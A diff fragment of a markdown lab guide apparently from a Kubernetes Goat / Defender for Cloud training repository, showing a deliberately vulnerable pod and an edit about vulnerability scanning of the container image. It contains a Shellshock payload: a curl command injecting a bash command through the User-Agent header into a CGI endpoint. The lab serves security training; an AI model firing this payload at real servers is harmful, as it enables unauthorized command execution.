davisanc/DefenderforCloudGBBNinja/06-K8s/Kubernetes-goat/vulnerable-pod.md

 curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://[ip-address-shell-shock-pod]/cgi-bin/vulnerable
 ```

-Now, wait for Defender to raise a recommendation under the ACR to resolve vulnerabilities found
+Now, wait for Defender to raise a recommendation under the ACR to resolve vulnerabilities found.
+This recommendation is part of SAST scanning, once the image has been pushed to the registry the sandbox will trigger the scan of vulnerabilities

 ![container-vul](/images/container-vuln.png)